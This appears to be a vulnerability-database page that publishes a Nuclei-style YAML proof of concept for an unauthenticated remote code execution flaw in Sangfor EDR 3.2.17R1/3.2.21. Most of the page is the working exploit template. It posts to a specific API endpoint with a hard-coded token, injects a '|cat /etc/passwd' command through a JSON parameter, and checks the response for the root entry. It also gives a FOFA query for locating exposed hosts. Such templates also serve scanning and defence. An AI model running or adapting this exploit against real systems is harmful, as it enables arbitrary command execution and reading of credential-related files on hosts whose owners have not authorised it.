sangfor-edr-rce: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution

2025-08-01 Sangfor EDR PoC Public

Description

Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands.

PoC

id: sangfor-edr-rce

info:
  name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands.
  reference:
    - https://www.cnblogs.com/0day-li/p/13650452.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-78
  metadata:
    max-request: 1
    fofa-query: app="sangfor"
  tags: rce,sangfor,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      {"params":"w=123\"'1234123'\"|cat /etc/passwd"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d5095c7e8726c1caf25168067fdf7e4827a08d26e6487e9f934074f95f2316b7022100877f0f597654d5c219e3669352156976866823f137c8a21f91ceef64663702c6:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities